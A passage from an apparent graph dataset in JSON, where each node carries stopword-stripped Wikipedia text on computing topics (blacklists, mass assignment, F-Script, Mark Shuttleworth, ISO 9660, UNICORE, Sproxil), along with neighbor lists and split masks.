spam filter may keep blacklist email addresses mail would prevented reaching intended destination may also use sending domain names sending ip addresses implement general block addition private email blacklists lists kept public use including goal blacklist web browser prevent user visiting malicious deceitful web page via filtering locally common web browsing blacklist google safe browsing installed default firefox safari chrome blacklisting also apply user credentials common systems websites blacklist certain reserved usernames allowed chosen system website user populations reserved usernames commonly associated built-in system administration functions password blacklists similar username blacklists typically contain significantly entries username blacklists password blacklists applied prevent users choosing passwords easily guessed well known could lead unauthorized access malicious parties password blacklists deployed additional layer security usually addition password policy sets requirements password length and/or character complexity significant number password combinations fulfill many password policies still easily guessed i.e. password123 qwerty123 blacklists distributed variety ways use simple mailing lists dnsbl common distribution method leverages dns lists make use rsync high-volume exchanges data web-server functions may used either simple get requests may used complicated interfaces restful api expressed recent conference paper focusing blacklists domain names ip addresses used internet security lists generally intersect therefore appears lists converge one set malicious indicators concern combined economic model means blacklists essential part network defense need used concert whitelists greylists example would adblock plus blocklist includes number features including whitelists within blacklist adding prefix two symbols two pipe symbols e.g ||www.blocksite.com",
    "neighbors": [
      899,
      4100,
      5387,
      9745,
      1172,
      1305,
      10906,
      1438,
      8224,
      929,
      8998,
      2737,
      2227,
      9909,
      823,
      2108,
      4797,
      1472,
      6592,
      11073,
      708,
      2887,
      9181,
      2527,
      9824,
      9569,
      6757,
      2408,
      5482,
      5866,
      9712,
      10105,
      7035,
      5245
    ],
    "mask": "None"
  },
  {
    "node_id": 5408,
    "label": 4,
    "text": "Mass_assignment_vulnerability:mass assignment vulnerability mass assignment computer vulnerability active record pattern web application abused modify data items user normally allowed access password granted permissions administrator status many web application frameworks offer active record object-relational mapping features external data serialization formats automatically converted input internal objects turn database record fields framework interface conversion permissive application designer n't mark specific fields immutable possible overwrite fields never intended modified outside e.g admin permissions flag vulnerabilities found applications written ruby rails asp.net mvc java play framework 2012 mass assignment ruby rails allowed bypassing mapping restrictions resulted proof concept injection unauthorized ssh public keys user accounts github vulnerabilities ruby rails allowed creation internal objects specially crafted json structure asp.net core mapping restriction declared using codice_1 attribute",
    "neighbors": [
      11221,
      9467,
      5636,
      10341
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5409,
    "label": 9,
    "text": "F-Script_(programming_language):f-script programming language f-script object-oriented scripting programming language apple macos operating system developed philippe mougin f-script interactive language based smalltalk using macos native cocoa api f-script based pure object paradigm every entity manipulated within language object base syntax concepts identical language smalltalk canonical example object-oriented language specific extensions support array programming language apl f-script provides interpreted interactive environment support workspaces provide rich set functions including object persistence distributed objects graphical user interface gui framework database access among things like smalltalk f-script syntax simple without requiring specific notation control structures provided unified manner codice_1 operation unlike smalltalk f-script provides specific notational extensions support codice_2 class using curly brackets describe literal arrays may contain f-script expressions example codice_3 valid array literal empty array denoted codice_4 arrays arrays supported transparently since array another object message expressions f-script similar smalltalk specify object receiver message operation called message argument objects needed operation f-script supports unary binary keyword messages f-script message semantics extended support array programming recognizing array operation adding numerical vectors must viewed generating number messages relating elements vectors involved thus codice_5 codice_6 f-script allows codice_7 f-script chiefly used lightweight scripting layer top macos cocoa application programming interface api embedded applications using f-script framework interface builder palettes also used interactively f-script interpreter prototype applications finally used explore applications object hierarchies using injector f-script anywhere",
    "neighbors": [
      9345,
      2980,
      10406,
      7983,
      9780,
      1852,
      8262,
      4943,
      2901,
      11221,
      2519,
      1112,
      862,
      11625,
      9323,
      8303,
      9714,
      499,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 5410,
    "label": 2,
    "text": "Mark_Shuttleworth:mark shuttleworth mark richard shuttleworth born 18 september 1973 south african british entrepreneur founder ceo canonical ltd. company behind development linux-based ubuntu operating system 2002 became first south african travel space space tourist lives isle man holds dual citizenship south africa united kingdom born welkom south africa orange free state surgeon nursery-school teacher shuttleworth attended school western province preparatory school eventually became head boy 1986 followed one term rondebosch boys high school bishops/diocesan college head boy 1991 shuttleworth obtained bachelor business science degree finance information systems university cape town lived smuts hall student became involved installation first residential internet connections university 1995 shuttleworth founded still-extant thawte consulting company specialized digital certificates internet security december 1999 thawte acquired verisign earning shuttleworth r3.5 billion million equivalent million september 2000 shuttleworth formed hbd venture capital dragons business incubator venture capital provider march 2004 formed canonical ltd. promotion commercial support free software projects especially ubuntu operating system december 2009 shuttleworth stepped ceo canonical ltd jane silber took canonical ceo position shuttleworth resumed position ceo canonical july 2017 end silber tenure 1990s shuttleworth participated one developers debian operating system 2001 formed shuttleworth foundation nonprofit organisation dedicated social innovation also funds educational free open source software projects south africa freedom toaster 2004 returned free software world funding development ubuntu linux distribution based debian company canonical ltd 2005 founded ubuntu foundation made initial investment 10 million dollars ubuntu project shuttleworth often referred tongue-in-cheek title self-appointed benevolent dictator life sabdfl come list names people hire project shuttleworth took six months debian mailing list archives travelling antarctica aboard icebreaker kapitan khlebnikov early 2004 september 2005 purchased 65 stake impi linux 15 october 2006 announced mark shuttleworth became first patron kde highest level sponsorship available relationship ended 2012 together financial support kubuntu ubuntu variant kde main desktop 17 december 2009 mark announced effective march 2010 would step ceo canonical focus energy product design partnership customers jane silber coo canonical since 2004 took job ceo canonical september 2010 received honorary degree open university work 9 november 2012 shuttleworth kenneth rogoff took part debate opposite garry kasparov peter thiel oxford union entitled innovation enigma 25 october 2013 shuttleworth ubuntu awarded austrian anti-privacy big brother award sending local ubuntu unity dash searches canonical servers default year earlier 2012 shuttleworth defended anonymisation method used shuttleworth gained worldwide fame 25 april 2002 second self-funded space tourist first-ever south african space flying space adventures launched aboard russian soyuz tm-34 mission spaceflight participant paying approximately voyage two days later soyuz spacecraft arrived international space station spent eight days participating experiments related aids genome research 5 may 2002 returned earth soyuz tm-33 order participate flight shuttleworth undergo one year training preparation including seven months spent star city russia space radio conversation nelson mandela 14-year-old south african girl michelle foster asked marry politely dodged question stating honoured question changing subject terminally ill foster provided opportunity conversation mark shuttleworth nelson mandela reach dream foundation private jet bombardier global express often referred canonical one fact owned hbd venture capital company dragon depicted side plane norman hbd venture capital mascot upon moving r2.5 billion capital south africa isle man south african reserve bank imposed r250 million levy order release assets shuttleworth appealed lengthy legal battle reserve bank ordered repay r250 million plus interest shuttleworth announced would donating entire amount trust established help others take cases constitutional court 18 june 2015 constitutional court south africa reversed set aside findings lower courts ruling dominant purpose exit charge regulate conduct rather raise revenue",
    "neighbors": [
      1026,
      5644,
      2581,
      4123,
      10780,
      3618,
      6691,
      2109,
      10817,
      3654,
      8263,
      10822,
      589,
      4177,
      1107,
      8787,
      4192,
      7793,
      3189,
      5755,
      7812,
      8326,
      8848,
      657,
      2195,
      6808,
      1694,
      6302,
      8354,
      8364,
      3245,
      1717,
      6352,
      3802,
      4831,
      1761,
      4841,
      7913,
      9971,
      5369,
      7938,
      4360,
      4367,
      1813,
      7450,
      802,
      6947,
      5931,
      6445,
      7983,
      823,
      11069,
      843,
      11602,
      4437,
      4951,
      6489,
      3941,
      5990,
      7020,
      1394,
      2930,
      1396,
      11643,
      4493,
      10642,
      1939,
      11155,
      11669,
      3478,
      926,
      10142,
      7584,
      4011,
      9646,
      8112,
      439,
      9660,
      10687,
      5067,
      975,
      8147,
      3550,
      9696,
      11232,
      8177,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 5411,
    "label": 4,
    "text": "Shade_sandbox:shade sandbox shade sandbox sandbox-based isolation program developed eugene balabanov shade distributed consumers shareware solution creates isolated virtual environment within computer rather running software browsing internet directly instead perform actions fenced-off safe area mechanism creates highly controlled environment running untested untrustworthy apps without threatening host operating system shade sandbox basically plugin security toolkit engine platform enables developers build security-related solutions file monitors api spy utilities course virtual environments platform available corporate customers vendor site suggests capabilities platform provides plugins findmysoft rated shade sandbox 5 5 stars naming essential softpedia describes shade simple yet reliable anti-virus protection",
    "neighbors": [
      5380,
      4972,
      7983,
      9488,
      8466,
      7380,
      3484
    ],
    "mask": "Test"
  },
  {
    "node_id": 5412,
    "label": 9,
    "text": "SWEET16:sweet16 sweet16 interpreted byte-code language invented steve wozniak implemented part integer basic rom apple ii series computers created wozniak needed manipulate 16-bit pointer data implementation basic apple ii 8-bit computer sweet16 code executed running 16-bit processor sixteen internal 16-bit little-endian registers named registers well-defined functions 16 virtual registers 32 bytes total located zero page apple ii real physical memory map – values stored low byte followed high byte sweet16 interpreter located integer basic rom according wozniak sweet16 implementation model frugal coding taking 300 bytes memory sweet16 runs one-tenth speed equivalent native 6502 code",
    "neighbors": [
      8868,
      1029,
      5733,
      9739,
      10796,
      3630,
      1776,
      7281,
      5395,
      372,
      9911,
      7323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5413,
    "label": 6,
    "text": "ISO_9660:iso 9660 iso 9660 file system optical disc media published international organization standardization iso file system considered international technical standard since specification available anybody purchase implementations written many operating systems iso 9660 traces roots high sierra format file system high sierra arranged file information dense sequential layout minimize nonsequential access using hierarchical eight levels directories deep tree file system arrangement similar unix fat facilitate cross platform compatibility defined minimal set common file attributes directory ordinary file time recording name attributes name extension version used separate system use area future optional extensions file may specified high sierra adopted december 1986 changes international standard ecma international ecma-119 submitted fast tracking iso eventually accepted iso 9660:1988 2013 iso published amendment 1 iso 9660 standard introducing new data structures relaxed file name rules intended bring harmonization iso 9660 widely used 'joliet specification december 2017 3rd edition ecma-119 published technically identical iso 9660 amendment 1 following rough overall structure iso 9660 file system system area first 32,768 data bytes disc 16 sectors 2,048 bytes unused iso 9660 therefore available uses example cd-rom may contain alternative file system descriptor area often used hybrid cds offer classic mac os-specific macos-specific content multi-byte values stored twice little-endian big-endian format either one-after-another specification calls both-byte orders duplicated data structures path table structures designed unaligned members endian encoding however help implementors data structures need read byte-wise convert properly aligned data data area begins set one volume descriptors terminated volume descriptor set terminator collectively volume descriptor set acts header data area describing content similar bios parameter block used fat hpfs ntfs formatted disks volume descriptor set terminator simply particular type volume descriptor purpose marking end set structures volume descriptor 2048 bytes size fitting perfectly single mode 1 mode 2 form 1 sector following structure data field volume descriptor may subdivided several fields exact content depending type standard volume descriptor types following iso 9660 compliant disc contains least one primary volume descriptor describing file system volume descriptor set terminator indicating end descriptor sequence primary volume descriptor provides information volume characteristics metadata including root directory record indicates sector root directory located fields contain description name volume information created application size logical blocks file system uses segment volume also stored field inside primary volume descriptor well amount space occupied volume measured number logical blocks addition primary volume descriptor supplementary volume descriptors enhanced volume descriptors may present supplementary volume descriptors describe volume primary volume descriptor normally used providing additional code page support standard code tables insufficient standard specifies iso 2022 used managing code sets wider 8 bytes iso 2375 escape sequences used identify particular code page used consequently iso 9660 supports international single-byte multi-byte character sets provided fit framework referenced standards however iso 9660 specify code pages guaranteed supported use code tables defined standard subject agreement originator recipient volume enhanced volume descriptors introduced iso 9660 amendment 1 relax requirements volume descriptors directory records referenced example directory depth exceed eight file identifiers need contain file version number length file directory identifier maximized 207 redundant copies volume descriptor also included case first copy descriptor becomes corrupt directory entries stored following location root directory entry evaluation filenames begun directories files stored extents sequential series sectors files directories differentiated file attribute indicates nature similar unix attributes file stored directory entry describes file optionally extended attribute record locate file directory names file path checked sequentially going location directory obtain location subsequent subdirectory however file also located path table provided file system path table stores information directory parent location disc since path table stored contiguous region searched much faster jumping particular locations directory file path thus reducing seek time standard specifies three nested levels interchange paraphrased section 10 additional restrictions body standard depth directory hierarchy must exceed 8 root directory level 1 path length file must exceed 255 section 6.8.2.1 standard also specifies following name restrictions sections 7.5 7.6 path tables summarize directory structure relevant directory hierarchy providing directory identifier location extent directory recorded length extended attributes associated directory index parent directory path table entry restrictions filename length 8 characters plus 3 character extension interchange level 1 directory depth 8 levels including root directory serious limitation iso 9660 file system rock ridge extension works around eight-directory depth limit folding paths practice however drivers oses care directory depth rule often ignored addition restrictions mentioned cd-rom producer may choose one lower levels interchange specified chapter 10 standard restrict file name length 30 characters 8+3 file identifiers 8 directory identifiers order promote interchangeability implementations implement full standard sometimes mistakenly interpreted restriction iso 9660 standard numbers iso 9660 file systems except single byte value used gmt offset unsigned numbers length file extent disc stored 32 bit value allows maximum length 4.2 gb precisely one byte less 4 gib note older operating systems may handle values incorrectly i.e signed instead unsigned would make impossible access files larger 2 gb size latter holds true also operating systems without large file support based often assumed file iso 9660 formatted disc larger 2-1 size file size stored unsigned 32 bit value 2-1 maximum however possible circumvent limitation using multi-extent fragmentation feature iso 9660 level 3 create iso 9660 file systems single files 8 tib files larger 4 gib split multiple extents sequential series sectors exceeding 4 gib limit example free software infrarecorder imgburn mkisofs well roxio toast able create iso 9660 file systems use multi-extent files store files larger 4 gib appropriate media recordable dvds empirical tests 4.2 gb fragmented file dvd media shown microsoft windows xp supports mac os x 10.4.8 handle case properly case mac os x driver appears support file fragmentation i.e supports iso 9660 level 2 level 3 linux supports multiple extents another limitation number directories iso image structure called path table directory image path table provides number parent directory entry problem parent directory number 16-bit number limiting range 1 65,535 content directory written also different place making path table redundant suitable fast searching operating systems e.g windows use path table others e.g linux iso image disc consists 65,535 directories readable linux early windows versions files additional directories visible show empty zero length software tools problems managing path table directory limit exceeded popular application using iso format mkisofs aborts path table overflow nero burning rom windows pinnacle instant cd/dvd check whether problem occurs produce invalid iso file disc without warning several extensions iso 9660 relax limitations operating systems support extensions name translation file trans.tbl must used located every directory including root directory obsolete since operating systems use today iso 13490 standard extension iso 9660 format adds support multiple sessions disc since iso 9660 design read-only pre-mastered file system data written one go session medium written provision altering stored content iso 13490 created allow adding files writeable disc cd-r multiple sessions iso 13346/ecma-167 standard designed conjunction iso 13490 standard address shortcomings iso 9660 subset evolved udf format adopted dvds jis x 0606:1998 also known iso 9660:1999 japanese industrial standard draft created japanese national body jtc1 n4222 order make improvements remove limitations original iso 9660 standard draft submitted 1998 ratified iso standard yet changes includes removal restrictions imposed original standard extending maximum file name length 207 characters removing eight-level maximum directory nesting limit removing special meaning dot character filenames operating systems allow relaxations well reading optical discs several disc authoring tools nero burning rom mkisofs imgburn support so-called iso 9660:1999 mode sometimes called iso 9660 v2 iso 9660 level 4 mode removes restrictions following guidelines iso 9660:1999 draft iso 9660 file system images iso images common way electronically transfer contents cd-roms often filename extension codice_1 codice_2 less common also use commonly referred isos operating systems support reading iso 9660 formatted discs new versions support extensions rock ridge joliet operating systems support extensions usually show basic non-extended features plain iso 9660 disc operating systems support iso 9660 extensions include following",
    "neighbors": [
      5120,
      10752,
      2564,
      11270,
      5643,
      6669,
      3598,
      4624,
      10257,
      9236,
      6677,
      5142,
      8214,
      537,
      3611,
      540,
      5149,
      3102,
      9245,
      9249,
      9762,
      8227,
      8740,
      5158,
      7720,
      1577,
      10281,
      2101,
      3126,
      1079,
      7225,
      11323,
      10812,
      4669,
      576,
      3648,
      8772,
      10310,
      1098,
      1610,
      7754,
      4173,
      4174,
      9290,
      9808,
      10828,
      4178,
      1109,
      10839,
      603,
      9819,
      3170,
      10851,
      4708,
      10857,
      9836,
      7789,
      622,
      5231,
      8301,
      9839,
      4210,
      9840,
      4724,
      7796,
      9333,
      6263,
      1656,
      6265,
      7290,
      4731,
      9335,
      9343,
      10879,
      8841,
      7818,
      6797,
      654,
      8847,
      2193,
      2194,
      9874,
      10900,
      2197,
      8854,
      2199,
      4248,
      4763,
      11419,
      2206,
      671,
      7838,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      6820,
      10405,
      2221,
      5293,
      7342,
      7344,
      10413,
      3250,
      1203,
      5300,
      2230,
      7351,
      5816,
      10938,
      188,
      1212,
      2749,
      8380,
      10428,
      3265,
      2244,
      8391,
      200,
      8904,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      2782,
      9442,
      739,
      4836,
      7907,
      4326,
      2279,
      8421,
      4841,
      1770,
      8426,
      3308,
      8938,
      10476,
      1263,
      1775,
      3312,
      3826,
      2291,
      10993,
      246,
      3834,
      1791,
      3328,
      11519,
      11012,
      2314,
      8461,
      3856,
      3857,
      1810,
      6416,
      8977,
      3351,
      6935,
      8473,
      11033,
      11543,
      8988,
      11036,
      11546,
      287,
      1825,
      6434,
      3368,
      3881,
      5928,
      4907,
      9004,
      6445,
      302,
      7983,
      10024,
      6961,
      10026,
      6963,
      1844,
      9525,
      10029,
      823,
      10039,
      10238,
      6970,
      6972,
      11072,
      6977,
      3394,
      10052,
      3909,
      2378,
      11056,
      8524,
      4431,
      5969,
      3922,
      4439,
      2904,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      2919,
      10087,
      4458,
      9066,
      3953,
      5492,
      11638,
      3447,
      376,
      6519,
      890,
      9593,
      11128,
      2943,
      7554,
      3462,
      1418,
      5003,
      5004,
      7565,
      8075,
      8080,
      6545,
      5013,
      11675,
      6044,
      11676,
      414,
      2462,
      2974,
      929,
      7070,
      11677,
      11683,
      10151,
      4012,
      430,
      1454,
      6062,
      8110,
      8114,
      7603,
      8627,
      10673,
      11184,
      8631,
      1464,
      6584,
      1978,
      9655,
      2494,
      9151,
      960,
      8643,
      8132,
      5062,
      6088,
      969,
      3535,
      8659,
      7126,
      2519,
      1498,
      4058,
      5594,
      5596,
      478,
      2015,
      4064,
      6624,
      6114,
      6115,
      1509,
      9189,
      11494,
      6637,
      5614,
      7663,
      9709,
      6641,
      1010,
      3573,
      11256,
      2555,
      2045,
      3582,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 5414,
    "label": 7,
    "text": "UNICORE:unicore unicore uniform interface computing resources grid computing technology resources supercomputers cluster systems information stored databases unicore developed two projects funded german ministry education research bmbf european-funded projects unicore evolved middleware system used several supercomputer centers unicore served basis research projects unicore technology open source bsd licence available sourceforge concept grid computing first introduced book grid blueprint new computing infrastructure end 1998 1997 development unicore initiated german supercomputer centers alternative globus toolkit first prototype developed german unicore project foundations production version laid follow-up project unicore plus ended 2002 follow-up european projects extended functionality worked towards providing implementations open grid forum standards resulted release unicore 6 28 august 2007 unicore consists three layers user server target system tier user tier represented various clients primary clients unicore rich client graphical user interface based eclipse framework unicore commandline client ucc clients use soap web services communicate server tier xml documents used transmit platform site independent descriptions computational data related tasks resource information workflow specifications client server servers accessible via secure socket layer protocol single secure entry point unicore site gateway accepts authenticates requests forwards target service server unicore/x used access particular set grid resources site unicore supports many different system architectures ensures organization full control resources unicore/x servers may used access supercomputer linux cluster single pc unicore/x server creates concrete target system specific actions xml job description abstract job objects ajo received client available unicore services include job submission job management file access file transfer client-server server-server storage operations mkdir ls etc workflow submission management target system tier consists target system interface tsi directly interfaces underlying local operating system resource management system security within unicore relies usage permanent x.509 certificates issued trusted certification authority ca certificates used provide single sign-on unicore client i.e password requests handed user addition certificates used authentication authorization including mapping unicore user certificates local accounts e.g unix uid/gid signing xml requests sent ssl based communication channels across 'insecure internet links using x.509 certificates one example consideration well-known standards e.g released global grid forum ggf within unicore architecture trust delegation unicore uses signed saml assertions local authorisation controlled xacml policies components unicore technology open source software bsd license downloaded sourceforge repository many european international research projects base grid software implementations unicore e.g eurogrid grip openmolgrid viola japanese naregi project projects extended extending set core unicore functions including new features specific research project focus goals projects limited computer science community scientific domains bioengineering computational chemistry also using unicore basis work research like openmolgrid chemomentum projects within european deisa project leading hpc centers europe joined deploy operate pervasive distributed heterogeneous multi-tera-scale supercomputing platform unicore used grid middleware access deisa resources unicore deployed distributed computing infrastructures europe prace european grid infrastructure egi foreseen deployed upcoming extreme science engineering discovery environment xsede infrastructure united states unicore successfully used production environments e.g within john von neumann-institute computing nic access 294912 core jugene ibm bluegene/p supercomputer 26304 core juropa cluster users resources come broad field scientific domains including e.g astrophysics quantum physics medicine biology computational chemistry climatology",
    "neighbors": [
      11353,
      10625,
      5956,
      198,
      3449,
      3849,
      5258,
      7018,
      11658,
      3323,
      8912,
      8370,
      5492,
      249,
      2651,
      8702,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 5415,
    "label": 9,
    "text": "Language_primitive:language primitive computing language primitives simplest elements available programming language primitive smallest 'unit processing available programmer given machine atomic element expression language primitives units meaning i.e. semantic value language thus different tokens parser minimal elements syntax machine instruction usually generated assembler program often considered smallest unit processing although always case typically performs perceived one operation copying byte string bytes one computer memory location another adding one processor register another many today computers however actually embody even lower unit processing known microcode interprets machine code microcode instructions would genuine primitives instructions would typically available modification hardware vendor programmers high-level programming language hll program composed discrete statements primitive data types may also perceived perform single operation represent single data item higher semantic level provided machine copying data item one location another may actually involve many machine instructions instance finally hll statements particularly involving loops generate thousands even millions primitives low-level programming language lll comprise genuine instruction path length processor execute lowest level perception referred abstraction penalty interpreted language statement similarities hll primitives added layer statement executed manner similar hll statement must first processed interpreter process may involve many primitives target machine language fourth-generation programming languages 4gl fifth-generation programming languages 5gl simple one-to-many correspondence high-to-low level primitives elements interpreted language primitives embodied 4gl 5gl specifications approach original problem less procedural language construct oriented toward problem solving systems engineering",
    "neighbors": [
      2691,
      6021,
      7173,
      8582,
      9871,
      5395,
      10145,
      1841,
      8627,
      9911,
      7612,
      8262,
      4042,
      7627,
      8143,
      2529,
      4838,
      9330,
      9331
    ],
    "mask": "Test"
  },
  {
    "node_id": 5416,
    "label": 4,
    "text": "Sproxil:sproxil sproxil american venture capital-backed for-profit company based cambridge massachusetts provides consumer product verification service called mobile authentication service mas help consumers avoid purchasing counterfeit products service first mobile authentication service mas launch nigeria iso 27001 iso 9001 certified company also offers supply chain protection solutions including track trace mobile-based loyalty marketing programs advisory services sproxil operations nigeria mali ghana serving west africa tanzania kenya serving east africa india pakistan asia sproxil ’ service places security label scratch-off panel protected products consumers scratch panel point purchase reveal unique one-time use code form mass serialization code sent via sms mobile app country-specific short code consumer receives reply almost instantly indicating product genuine suspicious company also 24/7 call center provide support verification process take anonymous reports suspicious counterfeiting activity sproxil ’ services currently used several pharmaceutical companies fight counterfeit drugs fake drug market according world customs organization estimated 200 billion year industry problem counterfeit drugs particularly acute emerging markets world health organization estimates 30 drugs markets fake may harmful consumers date sproxil protects products across multiple industries including pharmaceuticals agribusiness automotive parts beauty personal care etc 2010 nafdac nigerian government agency overseeing food drugs endorsed sproxil platform service widely deployed throughout nigeria april 2011 cnn published video discussing role sproxil played fight counterfeit drugs nigeria sproxil along pfizer vodafone waterhealth international committed business call action bcta global leadership initiative made companies apply core business expertise achievement eight internationally agreed millennium development goals mdgs sproxil ceo ashifi gogo praised former united states president bill clinton described gogo ’ work “ genuinely remarkable achievement. ” february 2011 sproxil announced received 1.8 million funding acumen fund funding used help company expand india johnson johnson gsk glaxosmithkline using sproxil services africa nigerian distributor merck kgaa named biofem june 2011 sproxil launched operations india july 2011 kenya pharmacy poisons board ppb also adopted similar text message-based anti-counterfeiting systems early 2012 sproxil announced one million people africa checked medicines using text-message based verification service developed sproxil august 2012 sproxil bharti airtel global telecommunications company announced partnership combat counterfeit drug market africa using mpa airtel offer service absolutely free users charge sms based verification february 2013 sproxil signed east african cables protect electric cables zinduka initiative initiative utilizes mpa solution help consumers verify electrical cables genuine purchase partnership marked sproxil expansion non-pharmaceutical markets industries uses sproxil solution textile clothing underwear also around time prashant yadav senior research fellow director healthcare research initiative joined sproxil board advisors yadav expert pharmaceutical healthcare supply chain management emerging markets formerly professor supply chain management mit-zaragoza international logistics program currently serves advisor multiple organizations area pharmaceutical supply chains ceo ashifi gogo recently named white house immigrant innovator champion change schwab foundation social entrepreneur year 2014 work sproxil 2014 company expanded mobile authentication services originally available consumers sms call center adding mobile apps web app solution suite year sproxil became iso-27001 information security controls iso-9001 quality management systems certified comprehensive review internal processes soon kenya-based agribusiness company juanco sps officially launched consumer-facing project protects pesticide bestox 100ec mpa technology date company processed 75 million verifications consumers highest recorded number verifications kind 2017 unilever global development award 2016 innovative healthcare service provider year 2015 interface health excellence ihx challenge 2015 frost sullivan enabling technology leadership award 2014 schwab foundation social entrepreneur year award 2013 uspto patents humanity award 2013 1 health care 7 overall fast company magazine world 50 innovative companies 2012 ismp cheers award george didomizio industry award 2012 icc world business development award 2010 honorable mention global finals ibm entrepreneur smartcamp competition 2010 masschallenge finalist 2010 mobile infrastructure award mitx 2010 people ’ choice award accelerate michigan 2010 prize winner african diaspora marketplace 2010 audience choice award life sciences xconomy xsite 2009 outstanding commitment award global health clinton global initiative university",
    "neighbors": [
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5417,
    "label": 3,
    "text": "ARM_Cortex-A12:arm cortex-a12 arm cortex-a12 32-bit processor core licensed arm holdings implementing armv7-a architecture provides 4 cache-coherent cores cortex-a12 successor cortex-a9 arm renamed a12 variant cortex-a17 since second revision core early 2014 indistinguishable performance arm claims cortex-a12 core 40 percent powerful cortex-a9 core new features found cortex-a9 include hardware virtualization 40-bit large physical address extensions lpae addressing announced supporting big.little however shortly afterwards arm cortex-a17 announced upgraded version capability key features cortex-a12 core",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      8815,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 5418,
    "label": 9,
    "text": "Principles_of_Compiler_Design:principles compiler design principles compiler design alfred aho jeffrey ullman classic textbook compilers computer programming languages often called dragon book cover depicts knight dragon battle dragon green labeled complexity compiler construction knight wields lance shield labeled lalr parser generator syntax directed translation respectively rides horse labeled data flow analysis book may called green dragon book distinguish successor aho sethi ullman red dragon book second edition compilers principles techniques tools added fourth author monica s. lam dragon became purple hence becoming purple dragon book book also contains entire code making compiler back cover offers original inspiration cover design dragon replaced windmills knight quixote book published addison-wesley acknowledgments mention book entirely typeset bell labs using troff unix operating system little time seen outside laboratories",
    "neighbors": [
      1952,
      8262,
      9002,
      3468,
      7983,
      11023,
      5492,
      5464
    ],
    "mask": "None"
  },
  {
    "node_id": 5419,
    "label": 1,
    "text": "Ship_registration_in_Hong_Kong:ship registration hong kong hong kong shipping register set 1990 hong kong merchant shipping registration ordinance administered marine department hong kong since transfer sovereignty united kingdom 1997 hong kong authorised basic law government people ’ republic china using name “ hong kong china ” maintain separate ship registration system april 1999 hong kong government launched new measures improve ship registration system hong kong cooperation government shipping industry total tonnage ship registry hong kong reached 100 millions gross tonnes 2,440 vessels registered january 2016 hong kong ship register world ’ fourth largest ship register world ’ largest national flag register first time registration fee ship determined according gross tonnage gt annual tonnage charge ship determined referring net tonnage nt minimum annual tonnage charge hk 1,500 every tonne 1000 nt costing extra hk 3.5 15,000 nt whereby rate lowers hk 3 per tonne thereafter charge would exceed hk 77,500 annual tonnage charge atc reduction scheme since february 2006 annual tonnage charge atc reduction scheme enacted reduce long term cost ship owners whereby every two years qualifying period satisfying registered ship owner would right enjoy six months atc reduction following year general ship eligible registration ship 3 types registration full registration provisional registration bare boat charter registration registration procedures requires submission ship hong kong shipping register full provisional registration mortgages ship registered agents hk flag registration include hong kong registered ships enjoy 30 preferential port dues mainland china ports since january 2000 order reduce port light dues hong kong registered ships hksar expects sign agreements countries two-tier charging system income derived international trade hong kong registered ships exempted profits tax hksar also entered bilateral double taxation relief agreements 40 countries include agreement avoidance double taxation dta denmark germany netherlands norway singapore sri lanka united kingdom united states reciprocal tax exemption rte chile korea new zealand comprehensive dta cdta austria belgium brunei canada czech france guernsey hungary indonesia ireland italy japan jersey korea kuwait liechtenstein luxembourg mainland china malaysia malta mexico netherlands new zealand portugal qatar romania south africa spain switzerland thailand united arab emirates united kingdom vietnam flag state quality control fsqc system based information system monitor quality hong kong registered ships analyzing collecting information unqualified conditions ship identified flag state inspection pre-registration quality control prqc system involves marine department inspect ship ’ condition registered hong kong ship meet safety pollution prevention standards announced international maritime organization",
    "neighbors": [
      10073,
      41,
      676
    ],
    "mask": "Test"
  },
  {
    "node_id": 5420,
    "label": 9,
    "text": "Gregor_Kiczales:gregor kiczales gregor kiczales american computer scientist currently full time professor computer science university british columbia vancouver british columbia canada best known developing concept aspect-oriented programming aspectj extension java programming language designed working xerox parc also one co-authors specification common lisp object system author book art metaobject protocol along jim des rivières daniel g. bobrow kiczales work throughout years focused allowing software engineers create programs look much possible like design reduce complexity make code maintenance easier ultimately improving software quality pursuing undergraduate studies mit kiczales started research career 1980 mit lab computer science stayed 1983 1984 joined xerox palo alto research center software research lab member research staff becoming principal scientist 1996 throughout time parc kiczales developed important research works including aspect-oriented programming aspectj left parc 1999 focus computer science education 2000 moved canada joined department computer science university british columbia tenured professor ubc kiczales started software practices lab designed number courses related software engineering programming languages importantly designed cpsc 110 introductory programming course ubc curriculum students take first year undergraduate studies course focuses systematic program design means design recipes 2002 co-founded intentional software charles simonyi left company 2003 order return ubc 2012 senior aito dahl-nygaard prize work common lisp object system named acm fellow contributions aspect-oriented programming july 2017 appointed executive director ubc extended learning",
    "neighbors": [
      11490,
      2438,
      8173,
      5677,
      2062,
      5585,
      9969,
      9877
    ],
    "mask": "Test"
  },
  {
    "node_id": 5421,
    "label": 4,
